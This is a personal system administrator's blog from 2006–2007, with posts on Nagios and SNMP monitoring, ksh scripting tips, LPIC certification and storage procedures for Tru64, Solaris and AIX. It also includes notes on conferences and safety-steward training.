
For some reason the design team decided to throw out the RJ45 console port that's been a Sun standard for nigh on ten years. And what did they replace it with? A DB25 port commonly seen in the Mesozoic Era! Good lord! This left me stranded without the proper cable for this morning's installation (thankfully I could borrow one). However, it also requires us to get completely new and different cables for our Cyclades console server!

Bad Sun! How could you make such a silly decision?!

View or add comments (curr. 5)

Training to be a safety steward

2007-06-24 10:24:00

A safety steward's jacket

Yesterday was a very well spent day! I may have been way too busy and I may have gotten way too little sleep, but it was damn well worth it. For yesterday was the first of two whole-day training sessions to become a BHV worker.

In Dutch, BHV is an abbreviation for Bedrijfs HulpVerlener, which can be roughly translated as Company Safety Steward. In short, these are the people who are there to limit the scope of a disaster on the workfloor while waiting for the professionals to arrive. They apply first aid, they guide evacuations and they fight starting fires. All in all a very important job!

Over here in the Netherlands, every company is required by law to have BHVs on hand. Originally the law required a minimum of one BHV per fifty people, but these days it just calls for an appropriate amount. This means that it could be anything between 1:10 (retirement homes, hospitals) and 1:50 (office buildings). BHVs should be sufficiently trained and know how to prevent panic and/or casualties.

Yesterday's session focussed on an intro to BHV, on communications during an incident and on fighting fires. This also included fighting gas and petrol fires using CO2 and foam extinguishers. This was a truly awesome day!

Our training was delivered by the good fellows of TBT fire and medical. If you're looking for a good BHV training, give these guys a ring.

View or add comments (curr. 4)

The passing of an era: Nagios

2007-05-20 19:05:00

Well, I have finally unsubscribed myself from the Nagios mailing lists. It was great being a member of those lists while I was working with the software on a daily basis, but these days I've put Nagios behind me. I haven't written one line of Nagios monitoring code for months now.

I'm sure I'll also be skipping this year's Nagios Konferenz unless a job involving monitoring comes up again.

Thanks Ethan, for making such great software freely available! All the best to you and maybe we'll meet again o/

View or add comments (curr. 0)

TruCluster: an interesting performance problem

2007-05-11 11:24:00

The past two weeks we've been having a rather mysterious problem with one of our TruClusters.

During hardware maintenance of the B-node we moved all cluster resources to the A-node to remain up and running. Afterwards we let TruCluster balance all the resources so performance would benefit again. Sounds good so far and everything kept on working like it should.

However, during some nights the A-node would slow to a crawl, not responding to any commands and inputs. We were stumped, because we simply couldn't find the cause of the problem. The system wasn't overloaded, with a low load average. The CPU load was a bit remarkable, with 10% user, 50% system and the rest in idle. The network wasn't overloaded and there was no traffic corruption. None of the disks were overloaded, with just two disks seeing moderate to heavy use. It was a mystery and we asked HP to help us out.

After some analysis they found the cause of the problem :) Among the resources of one of the applications that were failed over to the A-node were two file systems. After the balancing of resources these file systems stuck with the A-node, while the application moved back to the B-node. So the A-node was serving I/O to the B-node through the cluster interconnect! This also explains the high system-land CPU load: that was the kernel serving the I/O. :D

We'll be moving the file systems back to the B-node as well and we'll see whether that solves the issues. It probably will :)

View or add comments (curr. 0)

Cutting down on the use of pipes

2007-04-18 14:38:00

One of the obvious downsides to using a scripting language like ksh, as opposed to a "real" programming language like Perl or PHP (or C for that matter), is that for each command you string together, you're forking off a new process.

This isn't much of a problem when your script isn't too convoluted or when your dataset isn't too large. However, when you start processing 40-50MB log files with multiple FOR loops containing a few IF statements for each line, then you start running into performance issues.

And as I'm running into just that, I'm trying to find ways to cut down on the forking, which means getting rid of as many IFs and pipes as possible. Here are a few examples of what has worked for me so far...

Instead of running:

[ expr1 ] && command1

[ expr2 ] && command1


run:

[ expr1 -a expr2 ] && command1

Why? Because if test works the way I expect it to, it'll stop as soon as the first expression is false, meaning that it won't even try the second one. And either way you've replaced two separate test invocations with a single one. If you have multiple expressions that complement each other, then you ought to be able to fit them into a single test invocation, cutting down on more forks.

Instead of running:

if [ `echo $STRING | grep $QUERY | wc -l` -gt 0 ]; then


run:

if [ ! -z "`echo $STRING | grep $QUERY`" ]; then

More ideas to follow soon. Maybe I ought to start learning a "real" programming language? :D
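One more trick along the same lines (my own addition, not from the original list): for plain substring matching you can skip grep entirely, because the shell's case statement matches patterns without forking anything at all.

```shell
# Zero-fork substring matching: no grep, no wc, no subshell.
# $STRING and $QUERY are the same hypothetical variables as above.
STRING="an example log line"
QUERY="example"

case "$STRING" in
  *"$QUERY"*) echo "match" ;;
  *)          echo "no match" ;;
esac
```

This works in any Bourne-compatible shell, ksh included.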


OMG! I can't believe that I've only just learnt this now, after eight years in the field! When using the Korn shell, use [[ expr ]] for your tests as opposed to [ expr ].

Why? Because [ expr ] is a throw-back to Bourne shell compatibility that historically makes use of the external test binary, as opposed to the shell's built-in test function. This should speed things up considerably!
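A small sketch of the difference (my own example; the variable is made up):

```shell
# With [[ ]] the test is parsed by the shell itself, so it costs no
# fork at all, and && inside it short-circuits like you'd expect.
STRING="foobar"

if [[ -n "$STRING" && "$STRING" != "skip" ]]; then
    echo "processing $STRING"
fi
```

Note that [[ ]] is ksh (and bash) syntax, not plain Bourne shell.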

View or add comments (curr. 0)

On commenting and debugging your code

2007-04-16 16:38:00

When writing shell scripts for my customers I always try to be as clear as possible, allowing them to modify my code even long after I'm gone. In order to achieve this I usually provide a rather lengthy piece of opening comments, with comments added throughout the script for each subroutine and for every switch or command that may be unclear to the untrained eye.

In general I've found that it's best to have at least the following information in your opening blurb:

* Who made the program? When was it finalised? Who requested the script to be made? Where can the author be reached for questions?

* A "usage" line that shows the reader how to call the program and which parameters are at his disposal.

* A description of what the program actually does.

* Descriptions for each of the parameters and options that can be passed to the script.

* The limitations imposed upon the script. Which specific software is needed? What other requisites are there? What are the nasty little things that may pop up unexpectedly?

* What are the current bugs and faults? The so-called FIXMEs.

* A description of the input that the program takes.

* A description of the output that the program generates.

Equally important is the inclusion of debugging capabilities. Of course you can start adding "echo" lines at various, strategic points in the script when you run into problems, but it's oh-so-much nicer if they're already in there! Adding those new lines is usually a messy affair that can make your problems even worse :( I usually prepend the debugging commands with "[ $DEBUG -eq 1 ] &&", which allows me to turn the debugging on or off at the top of the script using one variable.
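To sketch the pattern (a minimal example of my own, not lifted from any of the scripts mentioned):

```shell
#!/bin/sh
# One variable at the top of the script toggles all debugging output.
DEBUG=1

# Every debugging line carries the same guard in front of it:
[ "$DEBUG" -eq 1 ] && echo "DEBUG: starting main loop" >&2

# ... the actual work goes here ...

[ "$DEBUG" -eq 1 ] && echo "DEBUG: main loop done" >&2
exit 0
```

Set DEBUG=0 and every one of those lines turns into a cheap no-op (the trailing exit 0 keeps the last guard from dictating the script's exit status).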

And finally, for the more involved scripts, it's a great idea to write a small test suite. Build a script that actually takes the real script through its loops by automatically generating input and by introducing errors.

Two examples of scripts where I did all of this are check_suncluster and check_log3, with a new one on its way in a few days.

So far, it checks in at:

* 497 lines in total.

* 306 lines of actual code.

* 136 lines of comments.

* 55 lines of debugging code.

Approximately 39% of this script exists solely for the benefit of the reader and user.

View or add comments (curr. 0)

w00t! Passed my LPIC-102!

2007-04-06 10:57:00

Yay! There wasn't much reason for my doubting :) I passed with a 690 score (on a 200-930 scale), which boils down to 87% of 73 questions answered correctly. Not bad... Not bad at all...

Next up: ITIL Foundations!

View or add comments (curr. 7)

LPIC-102 summary

2007-04-03 23:41:00

The LPIC-102 summary is done. You can find it over here, or in the menu on the left. Enjoy!

View or add comments (curr. 0)

Finally! I'm done!

2007-04-03 23:37:00

Calvin hard at work

Ruddy heck, what a day! All in all it took me around thirteen hours, but I've finally finished my LPIC-102 summary. 41 pages of Linuxy goodness, bound to drag me through the second part of my LPIC-1 exams.

Argh, now I'm off to bed. =_= *cough* Let's hope I don't get called for any stand-by work.

View or add comments (curr. 2)

Preparing for LPIC-102

2007-03-20 21:01:00

Cailin working hard

One of the rules my employer Snow imposes on its employees is a rather strict certification track. Technically speaking each employee progresses through five C-levels, starting at 0 and ending up at 4. As you reach new levels of certification you will also reap the benefits of your hard work.

Let's take the track that applies to me as an example:

C0 = no certification

C1 = LPIC1 (101 and 102) and ITIL Fundamentals

C2 = LPIC2 (201 and 202)

C3 = SCSA1 and SCSA2

C4 = SCNA and others

The irony of the matter is that I've already achieved both SCSA exams and the SCNA exam a long time ago, but that I'm still stuck at C0 because I haven't done my LPICs. So to work myself up the ladder I'm slogging my way through the requisite LPIC stuff, even though I'm not that fond of Linux.

The challenge here lies in the fact that I haven't used Linux in a professional environment that much, so I'm at a disadvantage compared to the rest of my colleagues. I'm really glad I've always been a rather good student, so cramming with a few books should get me through. I managed to score a 660 (87%) on my LPIC-101, so that brings some hope :)

And now I'm cramming for the 102 exam! Since I was postponing it way too long, I reckoned I'd better get my act together! This week I took two days off to dedicate myself completely to studying. I managed to work through six of the nine objectives in these two days, resulting in a thirty-one page summary so far. In two weeks time I'll take another two days and then I'll be ready!

Like last time I'll post my summary over here, to help out all those other souls trundling through their LPICs.

View or add comments (curr. 3)

Parallellization in shell scripts

2007-03-13 15:05:00

Today I was working on a shell script that's supposed to process multiple text files in the exact same manner. Usually you can get through this by running a FOR-loop where the code inside the loop is repeated for each file in a sequential manner.

Since this would take a lot of time (going over 1e6 lines of text in multiple passes) I wondered whether it wouldn't be possible to run the contents of the FOR-loop in parallel. I rehashed my script into the following form:



subroutine ()
{
    contents of old FOR-loop, using $FILE
}

for FILE in "list of files"
do
    subroutine &
done


This will result in a new instance of your script for each file in the list. Got seven files to process? You'll end up with seven additional processes that are vying for the CPUs attention.

On average I've found that the performance of my shell script improved by a factor of 2.5, going from ~40 lines per three seconds to ~100 lines per three seconds. I was processing seven files in this case.

The only downside is that you're going to have to build in some additional code that prevents your shell script from running ahead while the subroutines are running in the background. What this code needs to be fully depends on the stuff you're doing in the subroutine.
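In ksh and other Bourne-style shells, the simplest form of that additional code is the wait built-in, which blocks until every background child has exited. A minimal sketch (the file names and the trivial subroutine body are made up):

```shell
#!/bin/sh
# Run the per-file work in parallel, then block until all of it is done.
subroutine()
{
    wc -l "$1" > "$1.count"    # stand-in for the real processing
}

for FILE in input1.txt input2.txt input3.txt
do
    subroutine "$FILE" &
done

wait    # don't run ahead while the subroutines are still busy
echo "all files processed"
```

A bare wait covers every background job of the current shell; wait $! would wait for the most recently started one only.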

View or add comments (curr. 2)

Recovering a broken mirror in Tru64

2007-03-01 14:26:00

Today I faced the task of replacing a failing hard drive in one of our Tru64 boxen. The disk was part of a disk group being used to serve plain data (as opposed to being part of the boot mirror / rootdg), so the replacement should be rather simple.

After some poking about I came to the following procedure. Those in the know will recognize that it's very similar to how Veritas Volume Manager (VXVM) handles things. This is because Tru64 LSM is based on VXVM v2.

* voldiskadm -> option 4 -> list -> select the failing disk, this'll be used as $vmdisk below.

* voldisk list -> select the failing disk, this'll be used as $disk below.

* voldisk rm $disk

* Now replace the hard drive.

* hwmgr -show scsi -> take a note of your current set of disks.

* hwmgr -scan scsi

* hwmgr -show scsi -> the replaced disk should show up as a new disk at the bottom of the list. This'll be used as $newdisk below.

* dsfmgr -e $newdisk $disk

* disklabel -rw $disk

* voldisk list -> $disk should be labeled as "unknown" again.

* voldiskadm -> option 5 -> $vmdisk -> $disk -> y -> y -> your VM disk should now be replaced.

* volrecover -g $diskgroup -sb

The remirroring process will now start for all broken mirrors. Unfortunately there is no way of tracking its actual progress. You can check whether the mirroring's still running with "volprint -ht -g $diskgroup | grep RECOV", but that's about it.

View or add comments (curr. 2)

I've never liked HP-UX that much ...

2007-02-21 12:47:00

I've never been overly fond of HP-UX, mostly sticking to Solaris and Mac OS X, with a few outings here and there. Given the nature of one of my current projects however, I am forced to delve into HP's own flavour of Unix.

You see, I'm building a script that will retrieve all manner of information regarding firmware levels, driver versions and such, so we can start a network-wide upgrade of our SAN infrastructure. With most OSes I'm having a fairly easy time, but HP-UX takes the cake when it comes to being backwards :[

You see, if I want to find out the firmware level for a server running HP-UX I have two choices:

1. Reboot the system and check the firmware revision from the boot prompt.

2. Use the so-called Support Tools Manager utility, called [x,m,c]stm.

CSTM is the command-line interface to STM and thank god it's scriptable. In reality the binary is a menu-driven CLI system, but it takes an input file for your commands.

For those who would like to retrieve their firmware version automatically, here's how:
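The command block that originally sat here seems to have gone missing. For what it's worth, the usual non-interactive cstm incantation looks something like this; I'm reconstructing it from memory, so treat it as a sketch rather than gospel:

```
# Feed cstm its menu commands on stdin: select the system device,
# run the "info" tool, wait for it, then print the resulting infolog.
echo "selclass qualifier system;info;wait;infolog" | /usr/sbin/cstm
```

From there it's a matter of grepping the firmware line out of the infolog output.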


Uhm... FSCK! *growl* *snarl* What the heck is this?! For some screwed up reason my shell keeps on adding a NewLine char after the output of each command. That way a variable which gets its value from a string of commands will always be "$VALUE ". WTF?! o_O

I'm going to have to bang on this one a little more. More info later.

View or add comments (curr. 0)

The necessity of good reporting

2007-01-26 13:57:00

Finally, I've finished my fourth article for ;Login magazine. It'll appear in next month's issue, in the sysadmin section.

As is the tradition with my articles, I'll try to entice my fellow folks in IT to improve their "soft skills". In the past I've covered things like personal planning and various communications skills. This time I'll try to convey why good reporting is so important to your work and your projects.

HTML version.

PDF version.

View or add comments (curr. 0)

As promised: adding a new LUN to Tru64

2006-12-22 09:00:00

As promised a few days ago, here's a quick description of how to add a new LUN to a Tru64 box. Instead of editing the earlier post like I said I would, I thought I'd put it in a separate blog post. No need to edit the original one, since it's right below this one.

Adding a new LUN to a Tru64 box with TruCluster

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

hwmgr -scan scsi

3. Label the "disk".

disklabel -rw $DISK

4. Add the disk to a file domain (volume group).

mkfdmn $DISK $DOMAIN

5. Create a file set (logical volume).

mkfset $DOMAIN $FSET

6. Create a file system.

Not required on Tru64. Done by the mkfset command.

7. Test mount.

mount $MOUNT

8. Add to fstab.

vi /etc/fstab

Also, if you want to make the new file system fail over with your clustered application, add the appropriate cfsmgr command to the stop/start script in /var/cluster/caa/bin.

View or add comments (curr. 0)

Crash course in new OSes

2006-12-20 20:20:00

The past two weeks I've been learning new stuff at a very rapid pace, because my client uses only a few Solaris boxen and has no Linux whatsoever. So now I need to give myself a crash course in both AIX and Tru64 to do stuff that I used to do in a snap.

For example, there's adding a new SAN device to a box, so it can use it for a new file system. Luckily most of the steps that you need to take are the same on each platform. It's just that you need to use different commands and terms and that you can skip certain steps. The lists below show the instructions for creating a simple volume (no mirroring, striping, RAID tricks, whatever) on all three platforms.

Adding a new LUN to a Solaris box with SDS

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

devfsadm -C disks

3. Label the "disk".

format -> confirm label request

When using Solaris Volume Manager

4. Add the disk to the volume manager.

metainit -f $META 1 1 $DISK

5. Create a logical volume.

metainit $META -p $SOFTPART $SIZE

6. Create a filesystem

newfs /dev/md/rdsk/$META

7. Test mount.

mount $MOUNT

8. Add to vfstab.

vi /etc/vfstab

When using Veritas Volume Manager

4. Let Veritas find the new disk.

vxdctl enable

5. Initialize the disk for VXVM usage and add it to a disk group.

vxdiskadm -> initialize

6. Create a new volume in the diskgroup.

Use the vxassist command.

7. Create a file system.

newfs /dev/vx/rdsk/$VOLUME

8. Test mount.

mount $MOUNT

9. Add to vfstab

vi /etc/vfstab

Adding a new LUN to an AIX box with LVM

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

cfgmgr

3. Label the "disk".

Not required on AIX.

4. Add the disk to a volume group.

mkvg -y $VOLGRP -s 64 -S $DISK

5. Create a logical volume.

mklv -y $VOLNAME -t jfs2 -c1 $VOLGRP $SIZE

6. Create a filesystem

crfs -v jfs2 -d '$VOLNAME' -m '$MOUNT' -p 'rw' -a agblksize='4096' -a logname='INLINE'

7. Test mount

mount $MOUNT

8. Add to fstab.

vi /etc/filesystems

Adding a new LUN to a Tru64 box running TruCluster

I'll edit this post to add these instructions tomorrow, or on Friday. I still need to try them out on a live box ;)

Anywho. It's all pretty damn interesting and it's a blast having to almost instantly know stuff that's completely new to me. An absolute challenge! It's also given me a bunch of eye openers!

For example, I've always thought it natural that, in order to make a file system switch between nodes in your cluster, you'd have to jump through a bunch of hoops. Well, not so with TruCluster! Here you add the LUN, go through the steps described above and that's it! The OS automagically takes care of the rest. That took my brain a few minutes to process ^_^

View or add comments (curr. 0)

Got my LPIC-101

2006-12-14 11:37:00

This morning I went to my local Prometric testing center for my LPI 101 exam (part one of two for the LPIC-1). Beforehand I knew I wasn't perfectly prepared, since I'd skipped the trial exams and hadn't studied that hard, so I was a little anxious. Only a little though, since I usually test quite well.

Anywho: out of a maximum of 890 points I got 660, with 500 points being the minimum passing grade. Read item 2.15 on this page to learn more about the weird scoring method used by the LPI. It boils down to this: out of 70 questions I got 61 correct, with a minimum of 42 needed to pass. If we'd use the scoring method Sun uses, I'd have gotten an 87%. Not too bad, I'd say!

I did run into two things that I was completely unprepared for. I'd like to mention them here, so you won't run into the same problem.

1. All the time, while preparing, I was told that I'd have to choose a specialization for my exam: either RPM or DPKG. Since I know more about RPM I had decided to solely focus on that subject. But lo and behold! Apparently LPI has _very_ recently changed their requisites for the LPIC-1 exams and now they cover _both_ package managers! D:

2. In total I've answered 98 questions, instead of the 70 that was advertised. LPI mentions on their website (item 2.13) that these are test-questions, considered for inclusion in future exams. These questions are not marked as such and they do not count towards your scoring. It would've been nice if there had been some kind of screen or message warning me about this _at_the_test_site_.

Anywho... I made it, and now I'm on to the next step: LPIC-102.

View or add comments (curr. 0)

LPIC-101 Summary

2006-12-12 22:38:00

Version 1.0 of my LPIC-101 study notes is available. I bashed it together using the two books mentioned below. A word of caution though: this summary was made with my previous knowledge of Solaris and Linux in mind. This means that I'm skipping over a shitload of stuff that might still be interesting to others. Please only use my summary as something extra when studying for your own exam.

I'm up for my exam next Thursday, at ten in the morning. =_=;

Oh yeah... The books:

Ross Brunson - "Exam cram 2: LPIC 1", 0-7897-3127-4

Roderick W. Smith - "LPIC 1 study guide", 978-0-7821-4425-3

View or add comments (curr. 0)

NLOSUG meeting

2006-10-25 23:38:00

Phew! That was a long night! I'm not used to staying up this late on weekdays =_=

I went to the first NLOSUG meeting tonight, like I said I would a few days ago. Aside from finally learning a little bit about Open Solaris (although most of it was basic community stuff) and some more in-depth stuff on ZFS, it was also very cool to meet some old acquaintances. There was a bunch of folks from Sun whom I hadn't seen in a long time, as well as Martijn and Job with whom I'd worked as colleagues a long time ago. Shiny :)

So the eve' was mostly for fun, with a little education thrown in. Well worth the hours I put in...

View or add comments (curr. 3)

Using BSD hardware sensors with SNMP.

2006-10-25 09:05:00

Many thanks to my colleague Guldan, who pointed me towards a website giving a short description of using the BSD hardware-sensors daemon together with Nagios to monitor your hardware. Using sensord should make things a lot easier for people running BSD, as they won't have to muck about with SNMP OIDs and so on.

View or add comments (curr. 0)

Open Solaris Users Group

2006-10-20 13:13:00

Sun has made arrangements for the inaugural meeting of the Dutch Open Solaris Users Group. The meeting will be held on the evening of Thursday the 26th, at their office in Amersfoort.

Aside from the stuff you'd expect (like a few lectures on new Solaris features) you could also say it'll be a fun evening :) Meet some new people, have some food'n'drinks all mixed in with some interesting work-related stuff.

I'm game :)

View or add comments (curr. 0)

Two days of training

2006-10-17 19:38:00

Monday and Tuesday were not spent on the usual Nagios project in Amersfoort. Instead, I spent two days cooped up in a small hotel somewhere in the Achterhoek (for my foreign visitors: one of the Netherlands' rural, backwater areas). It was time well spent, on an inter-personal communications course from CCCM.

While I was originally quite sceptical, the course turned out fine. About halfway through Monday things took a turn that made me decide that their approach might not fit my preferences, but half an hour later I also decided that _sticking_ with the course would help me achieve one of my goals: learning to play my cards close to my chest and not letting a group of people in on my emotions regarding a subject. So even though the course may not be 100% up my alley, I may as well take the time to get some practice in :)

Anywho... November and January will see two additional training days, with a few personal talks at the CCCM office thrown in as well.

View or add comments (curr. 2)

Great minds think alike

2006-10-03 23:31:00

This goes to show that the proverb above is right: Joerg Linge, whom I met at NagKon 2006, just e-mailed me. He mentioned that at around the same time we had both come up with a similar solution to one problem.

The problem: use Nagios plugins through a normal SNMP daemon.

Our solutions were identical when it came to configuring the daemon, but differed slightly when it came to getting the information from the client. The approach is the same, but while he uses Perl for the plugin, I use Bash ^_^
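For reference, the daemon-side half of the trick boils down to a single exec line in snmpd.conf; the plugin path and thresholds below are hypothetical:

```
# /etc/snmp/snmpd.conf -- expose a Nagios plugin through Net-SNMP.
# The command's exit status and first line of output become readable
# through the UCD-SNMP-MIB extTable (.1.3.6.1.4.1.2021.8).
exec check_swap /usr/local/nagios/libexec/check_swap -w 10% -c 5%
```

The Nagios server then polls the corresponding extOutput/extResult objects with snmpget and maps the result back onto a Nagios state.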

Life's little coincidences :)

Joerg's solution and write-up.

My solution and write-up.

Anywho... Joerg's a cool guy :) Go check out his website and have a look around.

View or add comments (curr. 2)

Nagios Conference, aftermath

2006-09-24 09:04:00

So I made it back home in one piece. My trip back took me around 7.5 hours, which was mostly due to me driving a little bit faster :p

I have to say that the A45 route up north is much less glamorous than the A3 :( The Rasthöfe all look much older and less fancy than the ones along the A3. Ah, but they sufficed anyway...

I'm thinking of moving my summaries from the previous blog posts into one big page in the Sysadmin section. Reckon that should keep Google from ranking the Archives above the Sysadmin section when it comes to Nagios.

/me starts immediately.

View or add comments (curr. 0)

Nagios Conference, day 2

2006-09-22 23:27:00

< moved to Sysadmin section, to keep Google from messing up >

View or add comments (curr. 0)

Nagios Conference, intermission

2006-09-21 17:10:00

Astounding, by the way, the number of Apple laptops I see around here. Less than at SANE'06, but still around 35%. o/

View or add comments (curr. 0)

Nagios Conference, day 1

2006-09-21 17:01:00

< moved to Sysadmin section, to keep Google from messing up >

View or add comments (curr. 0)

Nagios Conference, intermission

2006-09-21 14:19:00

For the conference I had Snow buy me the iMic and a nice Philips microphone. For now though, I'm not completely happy with the setup.

* The mic is omnidirectional and thus doesn't pick up much of what the person out in front is saying, while it does pick up quite a lot of noise from the room.

* The iMic is a USB device and it seems that it claims enough CPU resources to mess with the rest of my system :(

Lunch was nice though! <3

View or add comments (curr. 0)

Nagios Conference, day 0

2006-09-20 23:21:00

< moved to Sysadmin section, to keep Google from messing up >

View or add comments (curr. 2)

Off to Germania I go!

2006-09-19 21:13:00

The next few days I'll be in Germania... Nürnberg, to be precise.

Together with around eighty other Nagios administrators and experts I'll be attending the first annual Nagios Conference. Over the course of two days we'll get a chance to meet up, exchange ideas and generally have a go at improving both Nagios and our knowledge of the software. I'm looking forward to it quite a lot.

Maybe I'll even meet up with a few of the mailing list members :) I'll bring the camera and I'll try to snap a few quick pics.

View or add comments (curr. 2)

Dependency hell

2006-08-23 14:37:00

Damn! I'm really starting to hate Dependency Hell. Installing a few Nagios check scripts requires the Perl Net::SNMP module. This in turn requires three other modules. Each of these three modules requires three more, three of which require a C compiler on your system (which we naturally don't install on production systems). And neither can we use the port/emerge/apt-get-like Perl tools from CPAN, since (yet again) these are production systems. Augh!

View or add comments (curr. 0)

Building RPM packages

2006-08-10 13:48:00

While working on the $CLIENT-internal package for the Nagios client (net-SNMP + NRPE + Nagios scripts + Dell/HP SNMP agent), I've been learning about compound RPM packages, i.e. packages where you combine multiple source .TGZs into one big RPM package. This requires a little magic when it comes to running the various configure and make scripts. Luckily I've found two great examples.

* SPEC file for TCL, a short SPEC file that builds a package from two source .TGZs.

* SPEC file for MythTV, a -huge- SPEC file that builds multiple packages from multiple source .TGZs, along with a very dynamic set of configure rules.
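The essence of the trick in both examples is that a spec file may declare several Source archives and unpack them with repeated %setup calls. A stripped-down sketch (package and tarball names invented for illustration):

```
# Two source archives combined into a single package.
Name:     nagios-client
Version:  1.0
Release:  1
Summary:  Compound Nagios client package (sketch)
License:  GPL
Source0:  nrpe-2.0.tar.gz
Source1:  nagios-plugins-1.4.tar.gz

%prep
%setup -q              # unpack Source0 and cd into its directory
%setup -q -T -D -a 1   # -T: skip default unpack, -D: keep dir, -a 1: also unpack Source1

%build
# run each tarball's own configure/make from here, one after the other
```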

View or add comments (curr. 0)

SANE 2006 conference notes

2006-08-09 07:35:00

After months and months I've uploaded the notes that I took at the various lectures at SANE 2006. They might be useful to -someone- out there. Who knows. Be aware though that portions of the notes are a mishmash of Dutch and English :) The notes can be found as .PDFs in the menu on the left.

View or add comments (curr. 0)

Listen up. Here's da plan...

2006-08-08 16:52:00

Because I've got all kinds of things lined up for me to do, I'm going to put them into order. That way both you and I will know what to expect. Here's my priorities:

1. Make the requisite changes to my website, so that it plays nicely with search engines. This shouldn't be more than an evening or two of work (barring any reruns of Doctor Who on BBC3).

2. Study for my two LPIC1 exams.

3. Revive the manga and anime section of the website. This needs regular updates, so I'm going to have to think of a few nice things to add to this. I'm thinking "reviews"... It's also meant to give me a couple of days off between studying for my four exams.

4. Study for my two LPIC2 exams.

5. Move other parts of the website into the mySQL database as well.

6. Improve the PHP code that gets data from the database. It could be much cleaner, safer and more efficient.

7. Build some form of CMS for myself, so I don't have to work in the database manually.

So there you have it, boys! The next few months of my life laid out for ya.

Parallel to da plan I will keep on expanding the Sysadmin section with new stuff I discover every week. And I will try to fit in a week or two of vacation somewhere along the line. I have a big bunch of video games that I finally want to finish!

View or add comments (curr. 0)

Creating packages

2006-08-08 11:04:00

Recently I've been trying to learn how to build my own packages, both on Solaris and on Linux. I mean, using real packages to install your custom software is a much better approach than simply working with .TGZ files. In the process I've found two great tutorials/books:

* Maximum RPM, originally written as a book by one of Red Hat's employees.

* Creating Solaris packages, a short HOWTO by Mark.

View or add comments (curr. 0)

SNMP = hard work

2006-08-01 17:23:00

Boy, lemme tell ya: making a nice SNMP configuration so you can actually monitor something useful takes a lot of work! :) The menu on the left has been gradually expanding with more and more details regarding the monitoring of Solaris (and Sun hardware) through SNMP. Check'em out!

View or add comments (curr. 0)

All work and no play...

2006-08-01 11:49:00

Busybusybusy, that's what I've been. I've been adding all kinds of new stuff to the Sysadmin section, telling you everything you'd like to know about monitoring Solaris and Sun hardware through SNMP.

I don't have much of interest to tell the non-admin people right now :) Better luck at a later point in time.

View or add comments (curr. 0)

Nagios clients for UNIX/Linux

2006-07-27 13:01:00

I've added a small comparison between the various ways in which your Nagios server can communicate with its clients. It's in the menu on the left, or you can go there directly.

View or add comments (curr. 0)

Using SNMP with Solaris and Sun hardware

2006-07-26 16:25:00

After digging through Sun's MIB description (see SUN-PLATFORM-MIB.txt) it became clear to me that things are a lot more convoluted than I originally expected. For example, each sensor in the Sun Fire systems leads to at least five objects, each describing another aspect of the sensor (name, value, expected value, unit, and so on). Unfortunately Sun has no (public) description of all possible SNMP sensor objects, so I've come to the following two conclusions:

1. I'll figure it all out myself. For each model that we're using I'll weasel out every possible sensor and all information relevant to these sensors.

2. I'll have to write my own check script for Nagios which deals with all the various permutations of sensor arrays in an appropriate fashion. Joy...


For your reference, Sun has released the following documents that pertain to their SNMP implementation. Mostly they're a slight expansion on the info from the MIB. At least they're much easier on the eyes when reading :p

* 817-2559-13

* 817-6832-10

* 817-6238-10

* 817-3000-10

View or add comments (curr. 0)


2006-07-25 09:34:00

Right now I'm working on getting my Sun systems properly monitored through SNMP. Using the LM_sensors module for Net-SNMP has gotten me quite far, but there's one drawback. A lot of Sun's internal counters use some really odd values that don't speak for themselves. This makes it necessary to read through Sun's own MIB and correlate the data in there with the stuff from LM_sensors.

Point is, Sun isn't very forthcoming with their MIB even though it should probably be public knowledge. Nowhere on the web can I find a copy of the file. The only way to get it is by extracting it from Sun's free SUNWmasfr package, which I have done: here's SUN-PLATFORM-MIB.txt

In no way am I claiming this file to be a product of mine and it definitely has Sun's copyright on it. I just thought I'd make the file a -little- bit more accessible through the Internet. If Sun objects, I'm sure they'll tell me :3

Fixes to check_log2 and check_log3

2006-06-19 15:11:00

Both check_log2 and check_log3 have been thoroughly debugged today. Finally. Thanks to both Kyle Tucker and Ali Khan for pointing out the mistakes I'd made. I also finally learned the importance of proper testing tools, so I wrote test_log2 and test_log3 which run the respective check scripts through all the possible states they can encounter.

Oh... check_ram was also -finally- modified to take the WARN and CRIT percentages through the command line. Shame on me for not doing that earlier.

Check_log3 is born

2006-06-01 14:53:00

Today I made an improved version of the Nagios monitor "check_log2", which is now aptly called "check_log3". Version 3 of this script gives you the option to add a second query to the monitor. The previous two incarnations only allowed you to search for one query and would return a Critical if it was found. Now you can also add a query which results in a Warning. Goody!
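Conceptually, the two-query logic boils down to something like the sketch below. This is a from-scratch illustration, not the actual check_log3 code; the function name and patterns are invented. Exit codes follow the standard Nagios plugin convention (0 = OK, 1 = WARNING, 2 = CRITICAL).

```shell
# check_two_patterns LOGFILE CRIT_PATTERN WARN_PATTERN
# The critical pattern wins over the warning pattern; the return
# value doubles as the Nagios plugin exit code.
check_two_patterns() {
    if grep -q "$2" "$1"; then
        echo "CRITICAL: found '$2' in $1"
        return 2
    elif grep -q "$3" "$1"; then
        echo "WARNING: found '$3' in $1"
        return 1
    fi
    echo "OK: no '$2' or '$3' in $1"
    return 0
}
```

A real log monitor typically also remembers how far it read the file on the previous run, which this sketch skips.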

Attending the SANE 2006 conference

2006-05-18 14:31:00

Thought I'd give you a little update from SANE'06. I'll keep it short, since there isn't an awful lot to tell.

* Monday: Linux SysAd course was cancelled so me and Frank switched over to the IPSec course. This was 100% new material to me and (while boring at times) it was quite interesting. Now I'll at least know what people are talking about.

* Tuesday: The Solaris SMF tutorial was well worth the money, although a full day would've suited the material -much- better than half a day. In the AM I decided to crash the BSD Packet Filter tutorial and I guess the tutor should be happy I did. He had some trouble with the Powerbook used for the presentation and I was able to resolve his problems :)

* Wednesday: A full day of CF Engine, which was -totally- worth the money! Mark Burgess is an awesome speaker! Funny, smart and capable of conveying the heart of the matter. I'd have loved to have this guy as a teacher in college!

* Thursday: As I suspected, the conference itself is quite "meh". A few interesting speeches throughout the day, but I'm mostly taking things slowly. Instead I'm reading a bit in my new books. Unfortunately I slept -horribly- last night, so I'll be skipping the Social Event in the evening. :(

Travelling to SANE 2006 in Delft

2006-05-15 18:17:00

The next few days I'll be cooped up in a hotel in Delft with my colleague Frank. We'll be visiting the SANE 2006 conference, which is a combination of vacation and studying. The first three days will consist of tutorials, with the remaining two being filled with various talks and keynotes. Should anyone feel the need to hook up with me, I'll be taking the following lectures:

* Monday = Linux system administration

